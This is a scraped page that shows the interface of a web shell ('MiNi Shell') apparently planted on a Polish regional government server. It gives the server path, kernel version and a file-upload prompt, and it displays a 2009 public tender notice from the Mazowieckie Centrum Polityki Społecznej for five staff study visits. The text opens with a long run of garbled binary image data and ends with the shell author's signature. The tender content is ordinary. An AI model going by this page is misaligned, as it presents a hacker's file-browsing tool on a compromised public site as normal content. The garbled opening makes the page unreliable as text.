JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090729/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090729/258912-N-2009.html

<p class="kh_header"><b>Warszawa: Zorganizowanie 5  wizyt studyjnych (jedna krajowa i cztery zagraniczne) dla 5 grup 22 osobowych - pracowników OPS, PCPR, MCPS</b><br>
<b>Numer ogłoszenia: 258912 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowieckie Centrum Polityki Społecznej , ul. Nowogrodzka 62A, 02-002 Warszawa, woj. mazowieckie, tel. 022 6224232, faks 022 6224732.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcps.mazovia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie 5  wizyt studyjnych (jedna krajowa i cztery zagraniczne) dla 5 grup 22 osobowych - pracowników OPS, PCPR, MCPS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem pierwszej części zamówienia jest zorganizowanie wizyty studyjnej do Niemiec dla 22 pracowników OPS z terenu województwa mazowieckiego i MCPS. -Przedmiotem drugiej części zamówienia jest zorganizowanie wizyty studyjnej do Hiszpanii dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS -Przedmiotem trzeciej części zamówienia jest zorganizowanie wizyty studyjnej do Austrii 22 pracowników PCPR z terenu województwa mazowieckiego i pracowników MCPS -Przedmiotem czwartej części zamówienia jest zorganizowanie wizyty studyjnej do Włoch dla 22 pracowników OPS z terenu województwa mazowieckiego ipracowników MCPS - Przedmiotem piątej części zamówienia jest zorganizowanie wizyty studyjnej krajowej dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS w województwie małopolskim..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu z przedmiotowego postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy. oraz spełniają warunki określone w art. 22 ust. 1 pkt. 1 - 3 ustawy.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonego przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust.1 ustawy oraz o braku przesłanek wykluczenia wykonawcy z postępowania o udzielenie zamówienia określonych w art. 24 ust. 1 i 2 ustawy...</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawcy zobowiązani są do złożenia następujących oświadczeń i dokumentów: a):Oświadczenia o spełnieniu warunków określonych w art. 22 ust.1 ustawy oraz o braku przesłanek wykluczenia Wykonawcy z postępowania o udzielenie zamówienia określonych w art. 24 ust. 1 i 2 ustawy - wg wzoru określonego w załączniku Nr 3 do SIWZ, b) Aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( nie podleganie wykluczeniu ). c)Oświadczenia Wykonawcy, że nie zalega z opłacaniem podatków, opłat z właściwego urzędu skarbowego, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. ( nie podleganie wykluczeniu ). UWAGA: Od Wykonawców prowadzących działalność w formie spółki jawnej wymaga się zaświadczenia wystawionego na spółkę nie na poszczególnych wspólników d) Oświadczenia Wykonawcy potwierdzające, że wykonawca nie zalega z uiszczaniem składek na ubezpieczenie zdrowotne i społeczne z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ( nie podleganie wykluczeniu ). e)Pełnomocnictwa do reprezentowania wykonawcy o ile ofertę składa pełnomocnik Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości; b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej,zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania...</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Kwalifikacje kadry dydaktycznej - 15</li>
<li>3 - Baza lokalowa i wyposażenie w sprzęt i pomoce dydaktyczne - 15</li>
<li>4 - Doświadczenie w zakresie objętym przedmiotem zamówienia - 10</li>
<li>5 - Program wizyty studyjnej o charakterze szkoleniowym - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mcps. mazovia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mazowieckie Centrum Polityki Społecznej ul. Nowogrodzka 62a 02-002 Warszawa tel. 0-22 622-42-32 fax.0-22 62247-32..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 10:00, miejsce: Mazowieckie Centrum Polityki Społecznej ul. Nowogrodzka 62a 02-002 Warszawa tel. 0-22 622-42-32 fax.0-22 62247-32..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji społecznej, Poddziałanie 7.1.3 podnoszenie kwalifikacji kadr pomocy i integracji społecznej..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem pierwszej części zamówienia jest zorganizowanie wizyty studyjnej do Niemiec dla 22 pracowników OPS z terenu województwa mazowieckiego i MCPS.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga aby realizacja wizyty studyjnej przypadała w terminie 23-27 września 2009 r (dopuszcza się przesunięcie terminu wizyty studyjnej maksymalnie do 14 dni kalendarzowych). Zamawiający wymaga zorganizowania wizyty studyjnej do Niemiec dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS. Zamawiający wymaga zorganizowania w ramach wizyty studyjnej 20 godzin zajęć dydaktycznych. Tematyka zajęć ma zawierać minimum programowe : Zapoznanie z doświadczeniami we wdrażaniu funduszy europejskich (głównie EFS) poprzez publiczne i niepubliczne instytucje pomocy społecznej w Niemczech. Przedstawienie zasad funkcjonowania instytucji pomocy i integracji społecznej w Niemczech. Zapoznanie z zadaniami realizowanymi przez instytucje pomocy społecznej w Niemczech. Zapoznanie z nowoczesnymi tendencjami rozwoju polityki społecznej w Niemczech w tym prowadzoną aktywizacją środowisk lokalnych. Zamawiający wymaga aby koszt wizyty studyjnej zawierał następujące składniki: Transport 22 osób spod siedziby Zamawiającego do miejsca odlotu i z miejsca przylotu do siedziby Zamawiającego. Przelot samolotem dla 22 osób z Polski do Niemiec i z powrotem klasą ekonomiczną, z posiłkiem w trakcie lotu. Transport 22 osób pomiędzy lotniskiem, hotelem i miejscami odbywania się szkoleń podczas trwania całej wizyty studyjnej. 4 noclegi dla 22 osób w hotelu (co najmniej 2 gwiazdkowym, w pokojach jednoosobowych z łazienkami). Pełne wyżywienie dla uczestników( trzy posiłki dziennie: śniadanie, obiad, kolacja).Przerwy kawowe podczas zajęć dydaktycznych (2 przerwy kawowe podczas jednego dnia szkoleniowego: kawa, herbata, soki, woda, ciasto, owoce). Szczegółowy program szkolenia z konspektami zajęć. Pełną realizację programu szkolenia (min. 20 godzin dydaktycznych ). Materiały szkoleniowe dla każdego uczestnika. Wizyty w instytucjach związanych z tematyką zamówienia. Opiekę pilota i tłumacza podczas trwania całej wizyty studyjnej. Ubezpieczenie wszystkich uczestników na czas wizyty studyjnej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej - 15</li>
<li>3. Baza lokalowa i wyposażenie w sprzęt i pomoce dydaktyczne - 15</li>
<li>4. Doświadczenie w zakresie objętym przedmiotem zamówienia - 10</li>
<li>5. Program wizyty studyjnej o charakterze szkoleniowym - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem drugiej części zamówienia jest zorganizowanie wizyty studyjnej do Hiszpanii dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga aby realizacja wizyty studyjnej przypadała w terminie 21-25 października 2009 r. (dopuszcza się przesunięcie terminu wizyty studyjnej maksymalnie do 7 dni kalendarzowych). Zamawiający wymaga zorganizowania wizyty studyjnej do Hiszpanii dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS. Zamawiający wymaga zorganizowania w ramach wizyty studyjnej 20 godzin zajęć dydaktycznych. Tematyka zajęć ma zawierać minimum programowe: Zapoznanie z doświadczeniami we wdrażaniu funduszy europejskich (głównie EFS) poprzez publiczne i niepubliczne instytucje pomocy społecznej w Hiszpanii. Przedstawienie zasad funkcjonowania instytucji pomocy i integracji społecznej w Hiszpanii. Zapoznanie z zadaniami realizowanymi przez instytucje pomocy społecznej w Hiszpanii. Zapoznanie z nowoczesnymi tendencjami rozwoju polityki społecznej w Hiszpanii w tym prowadzoną aktywizacją środowisk lokalnych. Zamawiający wymaga aby koszt wizyty studyjnej zawierał następujące składniki: Transport 22 osób spod siedziby Zamawiającego do miejsca odlotu i z miejsca przylotu do siedziby Zamawiającego. Przelot samolotem dla 22 osób z Polski do Hiszpanii i z powrotem klasą ekonomiczną, z posiłkiem w trakcie lotu. Transport 22 osób pomiędzy lotniskiem, hotelem i miejscami odbywania się szkoleń podczas trwania całej wizyty studyjnej. 4 noclegi dla 22 osób w hotelu (najmniej 2 gwiazdkowym, w pokojach jednoosobowych z łazienkami). Pełne wyżywienie dla uczestników( trzy posiłki dziennie: śniadanie, obiad , kolacja). Przerwy kawowe podczas zajęć dydaktycznych (2 przerwy kawowe podczas jednego dnia szkoleniowego: kawa, herbata, soki, woda, ciasto, owoce). Szczegółowy program szkolenia z konspektami zajęć. Pełną realizację programu szkolenia (min. 20 godzin dydaktycznych ). Materiały szkoleniowe dla każdego uczestnika. Wizyty w instytucjach związanych z tematyką zamówienia. Opiekę pilota i tłumacza podczas trwania całej wizyty studyjnej. Ubezpieczenie wszystkich uczestników na czas wizyty studyjnej...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej - 15</li>
<li>3. Baza lokalowa i wyposażenie w sprzęt i pomoce dydaktyczne - 15</li>
<li>4. Doświadczenie w zakresie objętym przedmiotem zamówienia - 10</li>
<li>5. Program wizyty studyjnej o charakterze szkoleniowym - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem trzeciej części zamówienia jest zorganizowanie wizyty studyjnej do Austrii 22 pracowników PCPR z terenu województwa mazowieckiego i pracowników MCPS.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga aby realizacja wizyty studyjnej przypadała w terminie 30 września - 04 października 2009 r. (dopuszcza się przesunięcie terminu wizyty studyjnej maksymalnie do 7 dni kalendarzowych) Zamawiający wymaga zorganizowania wizyty studyjnej do Austrii dla 22 pracowników PCPR z terenu województwa mazowieckiego i pracowników MCPS. Zamawiający wymaga zorganizowania w ramach wizyty studyjnej 20 godzin zajęć dydaktycznych. Tematyka zajęć ma zawierać minimum programowe: Zapoznanie z doświadczeniami we wdrażaniu funduszy europejskich (głównie EFS) poprzez publiczne i niepubliczne instytucje pomocy społecznej w Austrii. Przedstawienie zasad funkcjonowania instytucji pomocy i integracji społecznej w Austrii. Zapoznanie z zadaniami realizowanymi przez instytucje pomocy społecznej w Austrii. Zapoznanie z nowoczesnymi tendencjami rozwoju polityki społecznej w Austrii w tym prowadzoną aktywizacją środowisk lokalnych. Zamawiający wymaga aby koszt wizyty studyjnej zawierał następujące składniki: Transport 22 osób spod siedziby Zamawiającego do miejsca odlotu i z miejsca przylotu do siedziby Zamawiającego. Przelot samolotem dla 22 osób z Polski do Austrii i z powrotem klasą ekonomiczną, z posiłkiem w trakcie lotu. Transport 22 osób pomiędzy lotniskiem, hotelem i miejscami odbywania się szkoleń podczas trwania całej wizyty studyjnej. 4 noclegi dla 22 osób w hotelu (co najmniej 2 gwiazdkowym, w pokojach jednoosobowych z łazienkami). Pełne wyżywienie  dla uczestników( trzy posiłki dziennie: śniadanie, obiad , kolacja)  Przerwy kawowe podczas zajęć dydaktycznych (2 przerwy kawowe podczas jednego dnia szkoleniowego: kawa, herbata, soki, woda, ciasto, owoce). Szczegółowy program szkolenia z konspektami zajęć. Pełną realizację programu szkolenia (min. 20 godzin dydaktycznych ). Materiały szkoleniowe dla każdego uczestnika. Wizyty w instytucjach związanych z tematyką zamówienia. Opiekę pilota i tłumacza podczas trwania całej wizyty studyjnej. Ubezpieczenie wszystkich uczestników na czas wizyty studyjnej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej - 15</li>
<li>3. Baza lokalowa i wyposażenie w sprzet i pomoce dydaktyczne - 15</li>
<li>4. Doświadczenie w zakresie objetym przedmiotem zamówienia - 10</li>
<li>5. Program wizyty studyjnej o charakterze szkoleniowym - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem czwartej części zamówienia jest zorganizowanie wizyty studyjnej do Włoch dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga aby realizacja wizyty studyjnej przypadała w terminie 14 - 17 października 2009 r. (dopuszcza się przesunięcie terminu wizyty studyjnej maksymalnie do 7 dni kalendarzowych). Zamawiający wymaga zorganizowania wizyty studyjnej do Włoch dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS. Zamawiający wymaga zorganizowania w ramach wizyty studyjnej 20 godzin zajęć dydaktycznych. Tematyka zajęć ma zawierać minimum programowe: Zapoznanie z doświadczeniami we wdrażaniu funduszy europejskich (głównie EFS) poprzez publiczne i niepubliczne instytucje pomocy społecznej we Włoszech. Przedstawienie zasad funkcjonowania instytucji pomocy i integracji społecznej we Włoszech. Zapoznanie z zadaniami realizowanymi przez instytucje pomocy społecznej we Włoszech. Zapoznanie z nowoczesnymi tendencjami rozwoju polityki społecznej we Włoszech w tym prowadzoną aktywizacją środowisk lokalnych. Zamawiający wymaga aby koszt wizyty studyjnej zawierał następujące składniki: Transport 22 osób spod siedziby Zamawiającego do miejsca odlotu i z miejsca przylotu do siedziby Zamawiającego. Przelot samolotem dla 22 osób z Polski do Włoch i z powrotem klasą ekonomiczną, z posiłkiem w trakcie lotu. Transport 22 osób pomiędzy lotniskiem, hotelem i miejscami odbywania się szkoleń podczas trwania całej wizyty studyjnej. 4 noclegi dla 22 osób w hotelu (co najmniej 2 gwiazdkowym, w pokojach jednoosobowych z łazienkami). Pełne wyżywienie dla uczestników( trzy posiłki dziennie: śniadanie, obiad, kolacja ).Przerwy kawowe podczas zajęć dydaktycznych (2 przerwy kawowe podczas jednego dnia szkoleniowego: kawa, herbata, soki, woda, ciasto, owoce). Szczegółowy program szkolenia z konspektami zajęć. Pełną realizację programu szkolenia (min. 20 godzin dydaktycznych ). Materiały szkoleniowe dla każdego uczestnika. Wizyty w instytucjach związanych z tematyką zamówienia. Opiekę pilota i tłumacza podczas trwania całej wizyty studyjnej. Ubezpieczenie wszystkich uczestników na czas wizyty studyjnej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.10.2009.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem piątej części zamówienia jest zorganizowanie wizyty studyjnej krajowej dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS w województwie małopolskim..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga aby realizacja wizyty studyjnej przypadała w terminie 7 - 11 października 2009 r. (dopuszcza się przesunięcie terminu wizyty studyjnej maksymalnie do 7 dni kalendarzowych). Zamawiający wymaga zorganizowania wizyty studyjnej w województwie małopolskim dla 22 pracowników OPS z terenu województwa mazowieckiego i pracowników MCPS. Zamawiający wymaga zorganizowania w ramach wizyty studyjnej 20 godzin zajęć dydaktycznych. Tematyka zajęć ma zawierać minimum programowe: Zapoznanie z doświadczeniami we wdrażaniu funduszy europejskich (głównie EFS) poprzez publiczne i niepubliczne instytucje pomocy społecznej w województwie małopolskim. Przedstawienie funkcjonowania instytucji pomocy i integracji społecznej w województwie małopolskim Wizyty studyjne w instytucjach realizujących projekty unijne w ramach PO KL z zakresu pomocy i integracji społeczne Zapoznanie z nowoczesnymi tendencjami rozwoju polityki społecznej w województwie małopolskim w tym prowadzoną aktywizacją środowisk lokalnych. Zamawiający wymaga aby koszt wizyty studyjnej zawierał następujące składniki: Transport 22 osób spod siedziby Zamawiającego do miejsca szkolenia i z powrotem do siedziby Zamawiającego. Transport 22 osób pomiędzy hotelem i miejscami odbywania się szkoleń podczas trwania całej wizyty studyjnej. 4 noclegi dla 22 osób w hotelu (co najmniej 2 gwiazdkowym, w pokojach jednoosobowych z łazienkami). Pełne wyżywienie dla uczestników( trzy posiłki dziennie: śniadanie, obiad, kolacja). Przerwy kawowe podczas zajęć dydaktycznych (2 przerwy kawowe podczas jednego dnia szkoleniowego: kawa, herbata, soki, woda, ciasto, owoce). Szczegółowy program szkolenia z konspektami zajęć Pełną realizację programu szkolenia (min. 20 godzin dydaktycznych ). Materiały szkoleniowe dla każdego uczestnika. Wizyty w instytucjach związanych z tematyką zamówienia. Opiekę pilota podczas trwania całej wizyty studyjnej. Ubezpieczenie wszystkich uczestników na czas wizyty studyjnej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej - 15</li>
<li>3. Baza lokalowa i wyposazenie w sprzęt i pomoce dydaktyczne - 15</li>
<li>4. Doświadczenie w zakresie objętym przedmiotem zamówienia - 10</li>
<li>5. Program wizyty studyjnej o charakterze szkoleniowym - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com